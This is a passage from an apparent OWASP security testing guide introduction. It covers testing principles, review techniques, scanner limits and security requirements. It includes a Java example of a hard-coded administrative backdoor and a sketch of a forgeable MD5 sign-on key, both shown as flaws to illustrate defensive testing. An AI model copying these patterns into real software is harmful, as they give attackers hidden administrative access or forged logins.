'''Measuring (in)security: the Economics of Insecure Software'''&amp;lt;br&amp;gt;&lt;br /&gt;
A basic tenet of software engineering is that you can't control what you can't measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. We will not cover this topic in detail here, since it would take a guide on its own (for an introduction, see [2]). &lt;br /&gt;
&lt;br /&gt;
One aspect that we want to emphasize, however, is that security measurements are, by necessity, about both specific technical issues (e.g., how prevalent a certain vulnerability is) and how these issues affect the economics of software. We find that most technical people have at least a basic understanding of the vulnerabilities, and some a much deeper one. Sadly, few are able to translate that technical knowledge into monetary terms and thereby quantify the potential cost of vulnerabilities to the application owner's business. We believe that until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security.&amp;lt;br/&amp;gt;&lt;br /&gt;
While estimating the cost of insecure software may appear a daunting task, recently there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts.&lt;br /&gt;
&lt;br /&gt;
The framework described in this document encourages people to measure security throughout their entire development process. They can then relate the cost of insecure software to the impact it has on their business, and consequently develop appropriate business decisions (resources) to manage the risk. Remember: measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet.&lt;br /&gt;
&lt;br /&gt;
'''What is Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
What do we mean by testing? During the development life cycle of a web application, many things need to be tested. The Merriam-Webster Dictionary describes testing as: &lt;br /&gt;
* To put to test or proof. &lt;br /&gt;
* To undergo a test. &lt;br /&gt;
* To be assigned a standing or evaluation based on tests. &lt;br /&gt;
For the purposes of this document, testing is a process of comparing the state of a system/application against a set of criteria. In the security industry, people frequently test against a set of mental criteria that are neither well defined nor complete. For this reason and others, many outsiders regard security testing as a black art. This document’s aim is to change that perception and to make it easier for people without in-depth security knowledge to make a difference. &lt;br /&gt;
&lt;br /&gt;
'''Why Testing'''&amp;lt;br&amp;gt;&lt;br /&gt;
This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that they need to undertake to build and operate that testing program on their web applications. It is intended to give a broad view of the elements required to make a comprehensive web application security program. This guide can be used as a reference and as a methodology to help determine the gap between your existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, understand the magnitude of resources required to test and maintain their software, or prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review, will be covered in the remaining parts of this document. &lt;br /&gt;
&lt;br /&gt;
'''When to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
Most people today don’t test the software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artifacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:SDLC.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 1: Generic SDLC Model'' &amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. &lt;br /&gt;
&lt;br /&gt;
'''What to Test'''&amp;lt;br&amp;gt;&lt;br /&gt;
It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that &amp;quot;create&amp;quot; software, then it is logical that these are the factors that must be tested. Today most people generally test the technology or the software itself. &lt;br /&gt;
&lt;br /&gt;
An effective testing program should have components that test ''People'' – to ensure that there is adequate education and awareness; ''Process'' – to ensure that there are adequate policies and standards and that people know how to follow these policies; ''Technology'' – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves as defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at [http://www.fnf.com Fidelity National Financial], presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: &amp;quot;If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.&amp;quot; &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Feedback and Comments'''&amp;lt;br&amp;gt;&lt;br /&gt;
As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate.&lt;br /&gt;
&lt;br /&gt;
==Principles of Testing==&lt;br /&gt;
&lt;br /&gt;
There are some common misconceptions when developing a testing methodology to weed out security bugs in software. This chapter covers some of the basic principles that should be taken into account by professionals when testing for security bugs in software. &lt;br /&gt;
&lt;br /&gt;
'''There is No Silver Bullet'''&amp;lt;br&amp;gt;&lt;br /&gt;
While it is tempting to think that a security scanner or application firewall will either provide a multitude of defenses or identify a multitude of problems, in reality there are no silver bullets to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments and at providing adequate test coverage. Remember that security is a process, not a product. &lt;br /&gt;
&lt;br /&gt;
'''Think Strategically, Not Tactically'''&amp;lt;br&amp;gt;&lt;br /&gt;
Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990s. The patch-and-penetrate model involves fixing a reported bug without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. For more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not provide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. There are also several wrong assumptions in the patch-and-penetrate model: patches interfere with normal operations and might break existing applications, and not all users will be aware of a patch’s availability. Consequently, not all of a product's users will apply patches, either because of this interference or because they lack knowledge of the patch's existence.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;center&amp;gt;[[Image:WindowExposure.jpg]]&amp;lt;br&amp;gt;&lt;br /&gt;
''Figure 2: Window of Vulnerability''&amp;lt;/center&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
To prevent reoccurring security problems within an application, it is essential to build security into the Software Development Life Cycle (SDLC) by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The SDLC is King'''&amp;lt;br&amp;gt;&lt;br /&gt;
The SDLC is a process that is well-known to developers. Integrating security into each phase of the SDLC allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetypal SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Test Early and Test Often'''&amp;lt;br&amp;gt;&lt;br /&gt;
When a bug is detected early within the SDLC, it can be addressed more quickly and at a lower cost. A security bug is no different from a functional or performance-based bug in this regard. A key step in making this possible is to educate the development and QA organizations about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages might help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of those that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker's perspective. This allows each organization to consider security issues as part of their existing responsibilities.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Scope of Security'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., Confidential, Secret, Top Secret). Discussions should occur with legal counsel to ensure that any specific security need will be met. In the USA, such needs might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives might apply. For example, Directive 95/46/EC [10] makes it mandatory to treat personal data in applications with due care, whatever the application. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop the Right Mindset'''&amp;lt;br&amp;gt;&lt;br /&gt;
Successfully testing an application for security vulnerabilities requires thinking &amp;quot;outside of the box.&amp;quot; Normal use cases will test the normal behavior of the application when a user is using it in the manner that you expect. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find which assumptions made by web developers are not always true and how they can be subverted. This is one of the reasons why automated tools are poor at testing for vulnerabilities: such creative thinking must be applied on a case-by-case basis, since most web applications are developed in a unique way (even when they use common frameworks). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Understand the Subject'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, and more should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization's applications and network (e.g., IDS systems). &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use the Right Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. It is important to understand exactly what these tools can and cannot do, however, so that they are not oversold or used incorrectly. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''The Devil is in the Details'''&amp;lt;br&amp;gt;&lt;br /&gt;
It is critical not to perform a superficial security review of an application and consider it complete. This would instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positives that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Use Source Code When Available'''&amp;lt;br&amp;gt;&lt;br /&gt;
While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in production, they are not the most effective way to secure an application. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Develop Metrics'''&amp;lt;br&amp;gt;&lt;br /&gt;
An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. These metrics can show if more education and training are required, if there is a particular security mechanism that is not clearly understood by development, and if the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations might be a good head start.&amp;lt;br&amp;gt;&lt;br /&gt;
'''Document the Test Results'''&amp;lt;br&amp;gt;&lt;br /&gt;
To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable report format that is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report must be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report must be clear to the developer in pinpointing the exact function that is affected by the vulnerability, with associated recommendations for resolution in a language that the developer will understand (no pun intended). Last but not least, the report writing should not be overly burdensome on the security testers themselves; security testers are not generally renowned for their creative writing skills, and agreeing on a complex report can lead to instances where test results do not get properly documented.&lt;br /&gt;
&lt;br /&gt;
==Testing Techniques Explained==&lt;br /&gt;
&lt;br /&gt;
This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques, although Chapter 3 will address this information. This section is included to provide context for the framework presented in the next chapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover:&lt;br /&gt;
* Manual Inspections &amp;amp; Reviews &lt;br /&gt;
* Threat Modeling &lt;br /&gt;
* Code Review &lt;br /&gt;
* Penetration Testing &lt;br /&gt;
&lt;br /&gt;
=== Manual Inspections &amp;amp; Reviews ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Manual inspections are human-driven reviews that typically test the security implications of the people, policies, and processes, but can include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. Asking someone how something works and why it was implemented in a specific way allows the tester to quickly determine whether any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways to test the software development life-cycle process itself and to ensure that there is an adequate policy or skill set in place. As with many things in life, when conducting manual inspections and reviews we suggest you adopt a trust-but-verify model. Not everything everyone tells you or shows you will be accurate. Manual reviews are particularly good for testing whether people understand the security process, have been made aware of policy, and have the appropriate skills to design or implement a secure application. Other activities, including manually reviewing the documentation, secure coding policies, security requirements, and architectural designs, should all be accomplished using manual inspections.&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Requires no supporting technology &lt;br /&gt;
* Can be applied to a variety of situations&lt;br /&gt;
* Flexible &lt;br /&gt;
* Promotes teamwork &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Can be time consuming &lt;br /&gt;
* Supporting material not always available &lt;br /&gt;
* Requires significant human thought and skill to be effective!&lt;br /&gt;
&lt;br /&gt;
=== Threat Modeling ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Threat modeling has become a popular technique to help system designers think about the security threats that their systems/applications might face. Therefore, threat modeling can be seen as risk assessment for applications. In fact, it enables the designer to develop mitigation strategies for potential vulnerabilities and helps them focus their inevitably limited resources and attention on the parts of the system that most require it. It is recommended that all applications have a threat model developed and documented. Threat models should be created as early as possible in the SDLC, and should be revisited as the application evolves and development progresses. To develop a threat model, we recommend taking a simple approach that follows the NIST 800-30 [11] standard for risk assessment. This approach involves: &lt;br /&gt;
* Decomposing the application – understand, through a process of manual inspection, how the application works, its assets, functionality, and connectivity. &lt;br /&gt;
* Defining and classifying the assets – classify the assets into tangible and intangible assets and rank them according to business importance. &lt;br /&gt;
* Exploring potential vulnerabilities - whether technical, operational, or management. &lt;br /&gt;
* Exploring potential threats – develop a realistic view of potential attack vectors from an attacker’s perspective, by using threat scenarios or attack trees.&lt;br /&gt;
* Creating mitigation strategies – develop mitigating controls for each of the threats deemed to be realistic.&lt;br /&gt;
The output from a threat model itself can vary, but is typically a collection of lists and diagrams. The OWASP Code Review Guide outlines an Application Threat Modeling methodology that can be used as a reference when testing applications for potential security flaws in their design. There is no right or wrong way to develop threat models and perform information risk assessments on applications [12]. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Practical attacker's view of the system &lt;br /&gt;
* Flexible &lt;br /&gt;
* Early in the SDLC &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Relatively new technique &lt;br /&gt;
* Good threat models don’t automatically mean good software&lt;br /&gt;
&lt;br /&gt;
=== Source Code Review ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Source code review is the process of manually checking a web application's source code for security issues. Many serious security vulnerabilities cannot be detected with any other form of analysis or testing. As the popular saying goes “if you want to know what’s really going on, go straight to the source.&amp;quot; Almost all security experts agree that there is no substitute for actually looking at the code. All the information for identifying security problems is there in the code somewhere. Unlike testing third party closed software such as operating systems, when testing web applications (especially if they have been developed in-house) the source code should be made available for testing purposes. Many unintentional but significant security problems are also extremely difficult to discover with other forms of analysis or testing, such as penetration testing, making source code analysis the technique of choice for technical testing. With the source code, a tester can accurately determine what is happening (or is supposed to be happening) and remove the guess work of black box testing. Examples of issues that are particularly conducive to being found through source code reviews include concurrency problems, flawed business logic, access control problems, and cryptographic weaknesses as well as backdoors, Trojans, Easter eggs, time bombs, logic bombs, and other forms of malicious code. These issues often manifest themselves as the most harmful vulnerabilities in web sites. Source code analysis can also be extremely efficient to find implementation issues such as places where input validation was not performed or when fail open control procedures may be present. But keep in mind that operational procedures need to be reviewed as well, since the source code being deployed might not be the same as the one being analyzed herein [13].&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Completeness and effectiveness &lt;br /&gt;
* Accuracy &lt;br /&gt;
* Fast (for competent reviewers) &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Requires highly skilled security developers &lt;br /&gt;
* Can miss issues in compiled libraries &lt;br /&gt;
* Cannot detect run-time errors easily &lt;br /&gt;
* The source code actually deployed might differ from the one being analyzed&lt;br /&gt;
&lt;br /&gt;
'''For more on code review, check out the [[OWASP Code Review Project|OWASP code review project]]'''.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Penetration Testing ===&lt;br /&gt;
'''Overview'''&amp;lt;br&amp;gt;&lt;br /&gt;
Penetration testing has been a common technique used to test network security for many years. It is also commonly known as black box testing or ethical hacking. Penetration testing is essentially the “art” of testing a running application remotely, without knowing the inner workings of the application itself, to find security vulnerabilities. Typically, the penetration test team would have access to an application as if they were users. The tester acts like an attacker and attempts to find and exploit vulnerabilities. In many cases the tester will be given a valid account on the system. While penetration testing has proven to be effective in network security, the technique does not naturally translate to applications. When penetration testing is performed on networks and operating systems, the majority of the work is involved in finding and then exploiting known vulnerabilities in specific technologies. As web applications are almost exclusively bespoke, penetration testing in the web application arena is more akin to pure research. Penetration testing tools have been developed that automate the process, but, again, with the nature of web applications their effectiveness is usually poor. Many people today use web application penetration testing as their primary security testing technique. Whilst it certainly has its place in a testing program, we do not believe it should be considered as the primary or only testing technique. Gary McGraw in [14] summed up penetration testing well when he said, “If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don’t have a very bad problem”. However, focused penetration testing (i.e., testing that attempts to exploit known vulnerabilities detected in previous reviews) can be useful in detecting if some specific vulnerabilities are actually fixed in the source code deployed on the web site. &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Advantages:'''&lt;br /&gt;
* Can be fast (and therefore cheap) &lt;br /&gt;
* Requires a relatively lower skill-set than source code review &lt;br /&gt;
* Tests the code that is actually being exposed &lt;br /&gt;
&lt;br /&gt;
'''Disadvantages:'''&lt;br /&gt;
* Too late in the SDLC &lt;br /&gt;
* Front impact testing only!&lt;br /&gt;
&lt;br /&gt;
=== The Need for a Balanced Approach ===&lt;br /&gt;
With so many techniques and so many approaches to testing the security of web applications, it can be difficult to understand which techniques to use and when to use them.&lt;br /&gt;
Experience shows that there is no right or wrong answer to exactly what techniques should be used to build a testing framework. The fact remains that all techniques should probably be used to ensure that all areas that need to be tested are tested. What is clear, however, is that there is no single technique that effectively covers all security testing that must be performed to ensure that all issues have been addressed. Many companies adopt one approach, which has historically been penetration testing. Penetration testing, while useful, cannot effectively address many of the issues that need to be tested, and is simply “too little too late” in the software development life cycle (SDLC). &lt;br /&gt;
The correct approach is a balanced one that includes several techniques, from manual interviews to technical testing. The balanced approach is sure to cover testing in all phases of the SDLC. This approach leverages the most appropriate techniques available depending on the current SDLC phase. &lt;br /&gt;
Of course there are times and circumstances where only one technique is possible; for example, a test on a web application that has already been created, and where the testing party does not have access to the source code. In this case, penetration testing is clearly better than no testing at all. However, we encourage the testing parties to challenge assumptions, such as no access to source code, and to explore the possibility of more complete testing. &lt;br /&gt;
A balanced approach varies depending on many factors, such as the maturity of the testing process and corporate culture. However, it is recommended that a balanced testing framework look something like the representations shown in Figure 3 and Figure 4. The following figure shows a typical proportional representation overlaid onto the software development life cycle. In keeping with research and experience, it is essential that companies place a higher emphasis on the early stages of development.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionSDLC.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 3: Proportion of Test Effort in SDLC''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
The following figure shows a typical proportional representation overlaid onto testing techniques. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
[[Image:ProportionTest.png]]&lt;br /&gt;
&amp;lt;br&amp;gt;''Figure 4: Proportion of Test Effort According to Test Technique''&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''A Note about Web Application Scanners'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use automated web application scanners. While they undoubtedly have a place in a testing program, we want to highlight some fundamental issues about why we do not believe that automating black box testing is (or will ever be) effective. By highlighting these issues, we are not discouraging web application scanner use. Rather, we are saying that their limitations should be understood, and testing frameworks should be planned appropriately.&lt;br /&gt;
NB: OWASP is currently working to develop a web application scanner-benchmarking platform. The following examples indicate why automated black box testing is not effective. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 1: Magic Parameters'''&amp;lt;br&amp;gt;&lt;br /&gt;
Imagine a simple web application that accepts a parameter named “magic” together with its value. For simplicity, the GET request may be: ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=value&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt; To further simplify the example, the values in this case can only be the ASCII letters a–z (upper- or lowercase) and the digits 0–9. The designers of this application created an administrative backdoor during testing, but obfuscated it to prevent the casual observer from discovering it. By submitting the value sf8g7sfjdsurtsdieerwqredsgnfg8d (30 characters), the user will be logged in and presented with an administrative screen giving total control of the application. The HTTP request is now:&amp;lt;br&amp;gt; ''&amp;lt;nowiki&amp;gt;http://www.host/application?magic=sf8g7sfjdsurtsdieerwqredsgnfg8d&amp;lt;/nowiki&amp;gt;'' &amp;lt;br&amp;gt;&lt;br /&gt;
Given that all of the other parameters were simple two- and three-character fields, it is not feasible to start guessing combinations of approximately 30 characters. A web application scanner would need to brute force (or guess) the entire key space of 30 characters drawn from a 62-character alphabet: up to 62^30 permutations, vastly more than trillions of HTTP requests! That is an electron in a digital haystack! &lt;br /&gt;
The code for this exemplar Magic Parameter check may look like the following: &amp;lt;br&amp;gt;&lt;br /&gt;
 public void doPost( HttpServletRequest request, HttpServletResponse response) &lt;br /&gt;
 { &lt;br /&gt;
     // hard-coded backdoor value checked against the "magic" parameter &lt;br /&gt;
     String magic = "sf8g7sfjdsurtsdieerwqredsgnfg8d"; &lt;br /&gt;
     boolean admin = magic.equals( request.getParameter("magic")); &lt;br /&gt;
     if (admin) doAdmin( request, response); &lt;br /&gt;
     else ... // normal processing &lt;br /&gt;
 } &lt;br /&gt;
When one looks at the code, the vulnerability practically leaps off the page as a potential problem. &lt;br /&gt;
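The size of that search space can be checked with a short calculation. The sketch below (the class name is hypothetical) assumes, per the example, an alphabet of 62 possible characters (a–z upper- and lowercase plus the digits 0–9) at each of the 30 positions:&lt;br /&gt;

```java
import java.math.BigInteger;

// Size of the key space a black-box scanner would have to search by brute
// force: alphabetSize^length possible values.
public class KeySpace {
    public static BigInteger size(int alphabetSize, int length) {
        return BigInteger.valueOf(alphabetSize).pow(length);
    }

    public static void main(String[] args) {
        // 62 possible characters at each of 30 positions: a 54-digit number,
        // roughly 5.9 * 10^53 candidate values.
        System.out.println(KeySpace.size(62, 30));
    }
}
```

Even at millions of requests per second, exhausting such a space is computationally out of reach, which is precisely the point of the example.&lt;br /&gt;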
&amp;lt;br&amp;gt;&lt;br /&gt;
'''Example 2: Bad Cryptography'''&amp;lt;br&amp;gt;&lt;br /&gt;
Cryptography is widely used in web applications. Imagine that a developer decided to write a simple cryptography algorithm to sign a user in from site A to site B automatically. In his/her wisdom, the developer decides that if a user is logged into site A, then he/she will generate a key using an MD5 hash function that comprises: ''Hash { username : date }'' &amp;lt;br&amp;gt;&lt;br /&gt;
When a user is passed to site B, he/she will send the key on the query string to site B in an HTTP redirect. Site B independently computes the hash, and compares it to the hash passed on the request. If they match, site B signs the user in as the user they claim to be. Clearly, as we explain the scheme, the inadequacies can be worked out, and it can be seen how anyone who figures it out (or is told how it works, or downloads the information from Bugtraq) can log in as any user. Manual inspection, such as an interview, would have uncovered this security issue quickly, as would inspection of the code. A black-box web application scanner would have seen only a 128-bit hash that changed with each user and, by the nature of hash functions, did not change in any predictable way.&lt;br /&gt;
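A minimal sketch of why this scheme fails (class and method names are hypothetical; the construction follows the example above): because the key involves no secret, anyone who learns the construction can compute a valid key for any user.&lt;br /&gt;

```java
import java.math.BigInteger;
import java.security.MessageDigest;

// Sketch of the flawed single sign-on key from the example. The key is just
// MD5(username + ":" + date), so an attacker who knows the scheme can forge
// a valid key for any user without ever logging into site A.
public class WeakSsoKey {
    public static String key(String username, String date) throws Exception {
        MessageDigest md5 = MessageDigest.getInstance("MD5");
        byte[] digest = md5.digest((username + ":" + date).getBytes("UTF-8"));
        return new BigInteger(1, digest).toString(16); // hex-encoded 128-bit hash
    }

    public static void main(String[] args) throws Exception {
        // Site A issues a key for "alice"; the attacker independently
        // computes the identical key.
        String issued = WeakSsoKey.key("alice", "2009-06-04");
        String forged = WeakSsoKey.key("alice", "2009-06-04");
        System.out.println(issued.equals(forged)); // prints "true"
    }
}
```

A keyed construction (e.g., an HMAC with a secret shared between the two sites) would prevent this particular forgery, though the overall design would still need review.&lt;br /&gt;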
&amp;lt;br&amp;gt;&lt;br /&gt;
'''A Note about Static Source Code Review Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
Many organizations have started to use static source code scanners. While they undoubtedly have a place in a comprehensive testing program, we want to highlight some fundamental issues about why we do not believe this approach is effective when used alone. Static source code analysis alone cannot identify issues due to flaws in the design, since it cannot understand the context in which the code is constructed. Source code analysis tools are useful in finding security issues due to coding errors; however, significant manual effort is required to validate the findings. &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Security Requirements Test Derivation==&lt;br /&gt;
If you want to have a successful testing program, you need to know what the objectives of the testing are. These objectives are specified by security requirements. This section discusses in detail how to document requirements for security testing by deriving them from applicable standards and regulations and positive and negative application requirements. It also discusses how security requirements effectively drive security testing during the SDLC and how security test data can be used to effectively manage software security risks.&lt;br /&gt;
&lt;br /&gt;
'''Testing Objectives'''&amp;lt;br&amp;gt;&lt;br /&gt;
One of the objectives of security testing is to validate that security controls function as expected. This is documented via ''security requirements'' that describe the functionality of the security control. At a high level, this means proving confidentiality, integrity, and availability of the data as well as the service.  The other objective is to validate that security controls are implemented with few or no vulnerabilities. These are common vulnerabilities, such as the [[OWASP Top Ten]], as well as vulnerabilities that are previously identified with security assessments during the SDLC, such as threat modeling, source code analysis, and penetration test. &lt;br /&gt;
&lt;br /&gt;
'''Security Requirements Documentation'''&amp;lt;br&amp;gt;&lt;br /&gt;
The first step in the documentation of security requirements is to understand the ''business requirements''. A business requirement document can provide the initial, high-level description of the expected functionality of the application. For example, the main purpose of an application may be to provide financial services to customers or to allow goods to be browsed and purchased from an on-line catalogue. A security section of the business requirements should highlight the need to protect the customer data as well as to comply with applicable security documentation such as regulations, standards, and policies.&lt;br /&gt;
&lt;br /&gt;
A general checklist of the applicable regulations, standards, and policies is a good starting point for a preliminary security compliance analysis of a web application. For example, compliance regulations can be identified by checking information about the business sector and the country/state where the application needs to function/operate. Some of these compliance guidelines and regulations might translate into specific technical requirements for security controls. For example, in the case of financial applications, compliance with the FFIEC guidelines for authentication [15] requires that financial institutions implement applications that mitigate weak authentication risks with multi-layered security controls and multi-factor authentication. &lt;br /&gt;
&lt;br /&gt;
Applicable industry security standards also need to be captured by the general security requirements checklist. For example, in the case of applications that handle customer credit card data, compliance with the PCI DSS standard [16] forbids the storage of PINs and CVV2 data and requires that the merchant protect magnetic stripe data in storage and transmission with encryption, and on display by masking. Such PCI DSS security requirements could be validated via source code analysis.&lt;br /&gt;
&lt;br /&gt;
Another section of the checklist needs to enforce general requirements for compliance with the organization's information security standards and policies. From the functional requirements perspective, requirements for the security controls need to map to a specific section of the information security standards. An example of such a requirement can be: &amp;quot;a password complexity of six alphanumeric characters must be enforced by the authentication controls used by the application.&amp;quot; When security requirements map to compliance rules, a security test can validate the exposure of compliance risks. If violations of information security standards and policies are found, these will result in a risk that can be documented and that the business has to deal with (i.e., manage). For this reason, since these security compliance requirements are enforceable, they need to be well documented and validated with security tests. &lt;br /&gt;
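A requirement phrased that way can be encoded directly as a testable check. The sketch below is a hypothetical helper, assuming the example rule of at least six alphanumeric characters:&lt;br /&gt;

```java
// Hypothetical encoding of the example policy rule: passwords must be at
// least six characters long and consist only of alphanumeric characters.
public class PasswordPolicy {
    public static boolean meetsPolicy(String password) {
        if (password == null) {
            return false;
        }
        // [A-Za-z0-9]{6,} : six or more alphanumeric characters, nothing else
        return password.matches("[A-Za-z0-9]{6,}");
    }

    public static void main(String[] args) {
        System.out.println(PasswordPolicy.meetsPolicy("abc123")); // prints "true"
        System.out.println(PasswordPolicy.meetsPolicy("ab1"));    // prints "false"
    }
}
```

A security test for this requirement would then assert that the application's authentication controls reject any password failing such a check.&lt;br /&gt;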
&lt;br /&gt;
'''Security Requirements Validation'''&amp;lt;br&amp;gt;&lt;br /&gt;
